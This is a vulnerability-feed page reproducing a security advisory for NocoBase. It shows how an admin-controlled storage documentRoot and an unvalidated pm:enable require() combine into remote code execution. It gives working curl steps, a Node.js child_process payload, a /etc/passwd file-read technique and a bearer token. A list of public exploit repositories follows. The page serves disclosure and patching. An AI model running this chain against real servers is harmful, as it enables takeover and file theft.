Feed/GHSA-ghvf-qf6h-g8x5
GHSA-ghvf-qf6h-g8x5HIGHCVSS 0.0

NocoBase: Arbitrary File Write chained with Local file Inclusion leads to Remote code execution

Published Aug 20, 2026·Updated Aug 20, 2026

NVD Description

## Executive Summary Two vulnerabilities were identified and chained to achieve authenticated remote code execution The first vulnerability allows any authenticated admin to redirect the file upload storage root to an arbitrary path on disk including the application directory itself by supplying an unsanitized `documentRoot` value to the `storages:update` API. The second vulnerability allows the same admin to trigger Node.js `require()` on any absolute filesystem path via the `pm:enable` plugin manager endpoint, which accepts user-supplied paths with no validation (Local File Inclusion). Chained together, these two flaws allow an attacker with admin credentials to write a malicious file and have it trigger on the system achieving remote code execution. A working proof-of-concept exploit chain was developed and verified, requiring only a valid admin session token. ## VULN 1: Arbitrary File Write via `storages:update` documentRoot Manipulation ### Summary The file-manager plugin's storage update endpoint accepts an arbitrary `documentRoot` value without validation. An authenticated admin can overwrite a storage record's `documentRoot` to any absolute path on the filesystem, then upload files that land anywhere the Node.js process (root in default Docker deployments) can write including the web root, the application source directory, or system paths. ### Vulnerable Components `packages/plugins/@nocobase/plugin-file-manager/src/server/storages/local.ts` | `getDocumentRoot()` L24–27 | `packages/plugins/@nocobase/plugin-file-manager/src/server/actions/attachments.ts` | `createMiddleware()` Server route: `POST /api/storages:update` Server route: `POST /api/attachments:upload` ### Root Cause `getDocumentRoot()` resolves the `documentRoot` field from the storage record: ```javascript // packages/plugins/@nocobase/plugin-file-manager/src/server/storages/local.ts const { documentRoot = process.env.LOCAL_STORAGE_DEST || path.join(process.cwd(), 'storage', 'uploads') } = this.storage.options || {}; return path.resolve(path.isAbsolute(documentRoot) ? documentRoot : path.join(process.cwd(), documentRoot)); ``` `resolveSafePath()` is called during file upload to prevent filename traversal, but it uses the already-resolved (attacker-controlled) `documentRoot` as its safe root. There is **no validation on the `documentRoot` value itself** at creation or update time. An admin can set `documentRoot` to any path (`/`, `/etc`, `/var/www/html`, the app root) and the upload will write there. The creation endpoint (`storages:create`) also accepts arbitrary `documentRoot`, but the **update endpoint is worse**: it silently replaces the root on an existing (potentially already-default) storage, bypassing any frontend guards. ### Steps to Reproduce **Prerequisites:** Admin session token. **Step 1 Get the local storage ID:** ```bash curl -s "http://192.168.228.130:13000/api/storages" \ -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI" ``` Storage ID on this target: `366584416632832` **Step 2 Create the RCE payload:** ```bash cat > /tmp/rce_proof.js << 'EOF' const { execSync } = require('child_process'); const fs = require('fs'); const out = execSync('id; whoami; hostname').toString(); fs.writeFileSync('/home/spooky/nocobase/storage/uploads/out.txt', out); module.exports = {}; EOF ``` **Step 3 Redirect storage documentRoot to app CWD:** ```bash curl -s -X POST "http://192.168.228.130:13000/api/storages:update?filterByTk=366584416632832" \ -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI" \ -H "Content-Type: application/json" \ -d '{"options":{"documentRoot":"."},"default":true}' ``` <img width="826" height="304" alt="image" src="https://github.com/user-attachments/assets/808bf5cf-f6cc-4df6-9d94-b84cff1dcd66" /> **Step 4 upload the RCE payload:** The payload writes output to the NocoBase uploads directory, which is served statically on port 13000 ```bash curl -s -X POST "http://192.168.228.130:13000/api/attachments:upload" \ -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI" \ -F "file=@/tmp/rce_proof.js;filename=rce_proof.js;type=application/javascript" ``` <img width="826" height="322" alt="image" src="https://github.com/user-attachments/assets/146492ff-7eeb-4742-a13d-6bb3f9e0cd72" /> **Now that the file is uploaded successfully we can trigger the RCE with the LFI shown below** ## VULN 2: Error-Based Local File Inclusion via `pm:enable` Unsanitized `requireModule()` Call ### Overview `pm:enable` passes `filterByTk` directly to `require()` with no path validation. This is a standalone LFI primitive with two modes: - **Non-JS files** (e.g. `/etc/passwd`): Node.js parses them as JavaScript, fails with a `SyntaxError` that embeds the file content in the error message. That error is written to `system_error_YYYY-MM-DD.log` and is downloadable via `logger:download` giving an attacker blind/error-based file read. - **JS files** (e.g. an attacker-uploaded payload): the file executes as Node.js code in the server process RCE. This is the second stage of the chain with VULN-01. ### Root Cause The `enable` action takes `filterByTk` from query params and passes it directly to the CLI runner with zero validation: ```typescript // packages/core/server/src/plugin-manager/options/resource.ts L141-151 async enable(ctx, next) { const { filterByTk } = ctx.action.params; // ← raw user input if (!filterByTk) { ctx.throw(400, 'plugin name invalid'); } const keys = Array.isArray(filterByTk) ? filterByTk : [filterByTk]; app.runAsCLI(['pm', 'enable', ...keys], { from: 'user' }); // ← no sanitization ctx.body = filterByTk; await next(); }, ``` The CLI handler calls `requireModule(key)`: ```typescript // packages/core/utils/src/requireModule.ts export function requireModule(m: any) { if (typeof m === 'string') { m = require(m); // ← arbitrary file executed as Node.js module } if (typeof m !== 'object') { return m; } return m.__esModule ? m.default : m; } ``` `assertSafePluginPackageName()` exists in the codebase (validates against absolute paths and `..`) but is **never invoked** in the HTTP action path — only in storage directory helpers. The HTTP handler goes straight from user input → `require()`. ### Steps to Reproduce Error-Based File Read (Standalone) **Step 1 Trigger require() on any file:** ```bash curl -s "http://TARGET:13000/api/pm:enable?filterByTk=/etc/passwd" \ -H "Authorization: Bearer TOKEN" # Response: {"data":"/etc/passwd"} — 200 OK ``` Node.js attempts to parse `/etc/passwd` as a JavaScript module. It fails at the first `:` character with: <img width="2064" height="530" alt="image" src="https://github.com/user-attachments/assets/6aca1e88-a1c6-466a-8061-a0f3f7fbd4f8" /> and we see the error message after sending the request: <img width="1036" height="380" alt="image" src="https://github.com/user-attachments/assets/b8ddbf38-7de0-47ba-aa56-39ac4f2de400" /> **Step 2 navigate to the logger and download the system error log** <img width="1142" height="720" alt="image" src="https://github.com/user-attachments/assets/84103a14-99a6-4db0-bf86-35d5d09f730d" /> now when we extract the .tar file we can see proof of local file inclusion (partial in this response): <img width="1264" height="268" alt="image" src="https://github.com/user-attachments/assets/8f90ee8b-16d2-4bbf-8308-29ed80330ec8" /> ## Remote code execution With our node js payload sitting at the web root all we must do now is use the local file inclusion in pm:enable to trigger it ```bash curl -s "http://192.168.228.130:13000/api/pm:enable?filterByTk=/home/spooky/nocobase/rce_proof.js" \ -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI" ``` Retrieve output via NocoBase static file serving <img width="832" height="214" alt="image" src="https://github.com/user-attachments/assets/1ed60982-fc93-48f0-8b34-4bae0412ced2" /> <img width="810" height="96" alt="image" src="https://github.com/user-attachments/assets/15241236-2701-4488-a9a9-a504c9505562" />

Affected Packages (1)

@nocobase/serverNPM
Fixed in 2.1.5

Public Exploits & PoCs100 found

PoC: YellowKey-BitLocker-CVE-2026-45585

YellowKey BitLocker recovery - bitlocker yellowkey, yellowkey bitlocker, CVE-2026-45585, yellowkey github, yellowkey vulnerability, yellowkey CVE, TPM, BitLocker recovery key backup, Windows 10/11, CLI GUI, portable audit tool. Download:🡇

13

PoC: pixel-ksu-root

adb-driven KernelSU loader for stock Google Pixel: temporary kernel R/W via CVE-2026-43499 (GhostLock), then late-loads a signature-matched kernelsu.ko for the running KMI. Manager-agnostic.

5

PoC: CVE-2026-19745

Learn how I found my first two CVEs by pure accident.

1

PoC: cve-2026-23989-opencloud-lab

Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva

1

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

1

PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability

poc and yara rules

1

PoC: CVE-2026-72898

Metabase SQLi

1

PoC: CVE-2026-19478

GitLab Code injection

1

PoC: CVE-2026-75604

CVE-2026-75604 (Next.js Windows RCE) PoC - unauthenticated RCE via cache path traversal + forged Server Action; for authorized security testing

1

PoC: CVE-2026-19632

CVE-2026-19632 - TranslatePress One-Day PoC

1

PoC: CVE-2026-56705

CVE-2026-56705 - Adminer < 5.4.3 unauthenticated RCE via MSSQL PDO DSN injection (ODBC TraceFile arbitrary file write). PoC, Docker lab and negative test included.

1

PoC: CVE-2026-75604-poc

CVE-2026-75604 Next.js Windows RCE poc

1

PoC: CVE-2026-4692-trust-me-im-in-rdm

Firefox BrowsingContext field-sync authz bypass (N-day, bug 2017643): forged PContent::CommitBrowsingContextTransaction sets InRDMPane=true from a compromised content process - parent applies it. Prerequisite primitive for privileged-UI touch-event injection.

1

PoC: CVE-2022-28906-POC

CVE-2022-28906 Proof of concept in Python3

1

PoC: CVE-2026-41551

ROS# 路径遍历漏洞(CVE-2026-41551)

1

PoC: papercut-toolkit

#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained

PoC: PaperCut-CVE-2026-81578-82078

Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078

PoC: vankyo-s30-bootloader-unlock

Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

PoC: hdwebmobile-formula-pricing

WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE

PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write

CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.

PoC: CVE-2026-24061-payload

A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass

PoC: CVE-2026-66384

CVE-2026-66384 - Draft or TODO

PoC: CVE-2026-33017-PoC-Reverse-Shell

CVE-2026-33017 PoC Reverse Shell

PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules

CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules

PoC: CVE-2026-10036-speechbrain-rce

SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.

PoC: CVE-2025-55182-poc

I know you are probably here from Hack the Box, if so, yes this one actually works.

PoC: Project-CVE-2026-50751

IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.

PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine

A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.

PoC: Zimbra-CVE-2026-73570-Rules

Wazuh Rules for Detection Zimbra (CVE-2026-73570).

PoC: CVE-2022-46169

Cacti 1.2.22 unauthenticated command injection

PoC: CVE-2024-23897

Jenkins CVE-2024-23897 — CSRF-crumb aware PoC

PoC: CVE-2025-10952-ml-logger-AFR

PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3

PoC: CVE-2026-65643

CVE-2026-65643 - Draft or TODO

PoC: cve-2023-23397-detection-lab

Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.

PoC: fastjson-cve

fastjson-cve-2026-16723

PoC: CVE-2026-23751-poc

Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)

PoC: CVE-2023-27350-CVE-2023-27351

CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO

PoC: Project-CVE-2026-33017

CVE-2026-33017 - Langflow Unauthenticated RCE Exploit

PoC: CVE-2026-70463

Testing CVE-2026-70463 by Fyyre

PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report

Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.

PoC: CVE-2026-20131-Post-Incident-Written-Report

Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.

PoC: ghostlock-pfem10

GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes

PoC: htb-labs-connected

Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.

PoC: spring-ai-sibling-loop-poc

Minimal reproduction for Spring AI ParagraphManager sibling self-loop OOM (incomplete fix of CVE-2026-47851)

PoC: mssharepoint-scanner

A scanner for CVE-2026-55040 and CVE-2026-63520, designed to determine whether the server is affected by these two CVEs.

PoC: weblogic

Oracle WebLogic Console unauthenticated auth bypass + RCE exploit (CVE-2020-14882 / CVE-2020-14750)

PoC: CVE-2021-27876-veritas-backup

Metasploit module: Veritas Backup Exec Agent SHA-auth NDMP remote code execution (CVE-2021-27876/27877/27878)

PoC: rmg-s9180-fzg1

Root My Galaxy SM-S9180 (dm3q) S9180ZHS8FZG1 payload port - CVE-2026-43499 + KernelSU LKM

PoC: hacktivity-vulns-exploits-lab

Writeup + CVE analysis + countermeasures for the Hacktivity 'Vulnerabilities, Exploits, and Remote Access Payloads' lab (netcat shells, Metasploit, CVE-2010-1240, CVE-2004-2687).

PoC: CVE-2026-55040-Mass-Exploit

CVE-2026-55040

PoC: Project-CVE-2026-75604

A Python-based exploitation framework for CVE-2026-75604 that enables authorized penetration testers to validate Next.js Windows cache traversal vulnerabilities. Deploys reverse shells and webshells via path traversal, with built-in target verification and proxy support for seamless integration into standard pentest workflows.

PoC: CVE-2026-18963

CVE-2026-18963 Keycloak Reset-Credentials State Bypass Detector

PoC: CVE-2015-3246

CVE-2015-3246

PoC: CVE-2015-5287

CVE-2015-5287

PoC: htb-labs-nexus

Hack The Box Nexus machine write-up covering reconnaissance, Gitea credential discovery, Krayin CRM exploitation via CVE-2026-38526, initial access, and privilege escalation through a vulnerable Gitea template synchronization service.

PoC: Cisco-CVE-2026-20303-More

CVE-2026-20303, CVE-2026-20304, CVE-2026-20310, CVE-2026-20312, CVE-2026-20313

PoC: CVE-Ubiquiti

CVE-2026-77542, CVE-2026-77543, CVE-2026-77545, CVE-2026-77550, CVE-2026-77551, CVE-2026-77552, CVE-2026-77553, CVE-2026-77554, CVE-2026-77557 - Draft or TODO

PoC: CVE-2026-18431

CVE-2026-18431 - Draft or TODO

PoC: CVE-2026-8467

CVE-2026-8467 - Draft or TODO

PoC: CVE-2026-50787

Security advisory for CVE-2026-50787: uncontrolled resource consumption in e-SIC Livre CAPTCHA generation leading to remote denial of service.

PoC: solarview-ics-vulnerability-analysis

Threat model and vulnerability analysis of Contec SolarView Compact (CVE-2022-29303)

PoC: CVE-2026-72898-metabase-sqli

Detector + root-cause analysis for CVE-2026-72898 (Metabase unauthenticated SQLi via reset_password)

PoC: By-Poloss..-..CVE-2026-18080

Poc CVE-2026-18080

PoC: CVE-2026-63520

POC pre-auth RCE on Sharepoint chain

PoC: f_hid-4.14-backports

Backports of three published f_hid fixes (incl. CVE-2026-31721, CVE-2026-31606) to an EOL Linux 4.14.190 Android vendor kernel, with on-device verification records.

PoC: chrome-vuln-scanner

Check for CVE-2026-79266. A use-after-free in the DevTools component allows arbitrary code execution inside the sandbox via a malicious Chrome extension leveraging social engineering.

PoC: CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

PoC: CVE-2026-19632-POC

PoC for CVE-2026-19632 - TranslatePress – Multilingual <= 3.3.1 - Unauthenticated Account Takeover via Password Reset Link Disclosure

PoC: ghostlock-infinix-hot70

Proof-of-concept kernel exploit for GhostLock (CVE-2026-43499) on the Infinix Hot 70.

PoC: CVE-2025-2945-pgAdmin-RCE

PoC for CVE-2025-2945 — pgAdmin 4 authenticated eval() injection RCE, CVSS 9.9

PoC: CVE-2026-63072

CVE-2026-63072

PoC: CVE-2026-76904

PostGIS SQL Injection GeoTools

PoC: CVE-2014-085

ZooKeeper 未授权访问漏洞(CVE-2014-085)PoC 及靶场

PoC: hdwebmobile-photo-video-reviews

WooCommerce plugin: photo & video product reviews, closing CVE-2026-12684's unauthenticated-upload vulnerability class by construction

PoC: Exploit-CVE-2026-56705

CVE-2026-56705 — Adminer < 5.4.3 Unauthenticated RCE via MSSQL PDO DSN Injection

PoC: CVE-2026-73570

Zimbra SNMP Notification OS Command Injection — Unauthenticated RCE via SMTP exploit (Poc)

PoC: vivo-root-build

vivo/iQOO 提权 so 编译(CVE-2026-43499)

PoC: CVE-2026-72530-TrueConf-Sandbox-Escape-

Este repositorio contiene una demostración educativa de la mitigación y detección para **CVE-2026-72530**, una vulnerabilidad crítica de **Code Injection y Sandbox Escape** en TrueConf Server.

PoC: CVE-2021-41773-Exploit

CVE-2021-41773 Apache HTTP Server 2.4.49 Path Traversal to RCE Exploit

PoC: cve-2026-60004

CVE-2026-60004 es una vulnerabilidad crítica (CVSS 9.8) en Gitea que permite ejecución remota de código sin autenticación mediante el endpoint `/api/v1/repos/{owner}/{repo}/diffpatch`.

PoC: CVE-2026-68820_Mass_Exploit

CVE-2026-68820 — Mass Exploit Framework Edition.

PoC: CVE-2026-58073-check

Safely detect Veeam Service Provider Console auth bypass CVE-2026-58073

PoC: CVE-2026-18963

Nuclei template to discover Keycloak reset-credentials endpoints related to CVE-2026-18963 exposure validation.

PoC: CVE-2020-1472

CVE-2020-1472

PoC: CVE-2026-32635-Angular-XSS-Mitigation-

Demostracion educativa de mitigacion y deteccion de CVE-2026-32635: XSS en atributos i18n de Angular.

PoC: CVE-2018-16763_fuel_cms_exploit

A fuel CMS exploit based on Python for RCE mentioned in CVE-2018-16763.

PoC: CVE-2026-26211

Public disclosure for CVE-2026-26211, a stored XSS vulnerability affecting Ekushey Project Manager CRM v5.0.

PoC: keycloak-CVE-2026-18963

PoC, Dockerfile playground and root cause from patch diff analysis.

PoC: CVE-2026-17532-lab

CVE-2026-17532 Docker Lab.

PoC: Wildfire

CVE-2026-39154, Stored XSS in CometChat JS SDK

PoC: Trespasser

CVE-2026-74970, Fission site isolation bypass in Firefox WebRender

PoC: Palimpsest

CVE-2026-74945, Uninitialized heap disclosure via a crafted web font (sec-high)

PoC: SkeletonKey

CVE-2026-6765, Test only FormAutofill handlers exposed in Firefox

PoC: Revenant

CVE-2026-74943, Use after free in Firefox RasterImage (sec-high)

PoC: CVE-2026-73570

PoC for CVE-2026-73570 (Zimbra SMTP Command Injection)

PoC: EDRKiller

Use cve-2026-36425 killer edr,360 can killer

PoC: RootMyVivo

One-click root for vivo/iQOO devices on locked bootloader | CVE-2026-43499 + KernelSU

PoC: Exploit-For-CVE-2026-18963

Exploit for CVE-2026-18963 by BlackHatExploitation

PoC: gha-lab-aaaaa1cc3e

GitHub Actions workflow sandbox for CVE-2025-67727 reproduction

References

View on NVD Search GitHub Search Google

Get alerted for CVEs like this

Register your stack and get notified within minutes when a matching CVE drops.

Start monitoring free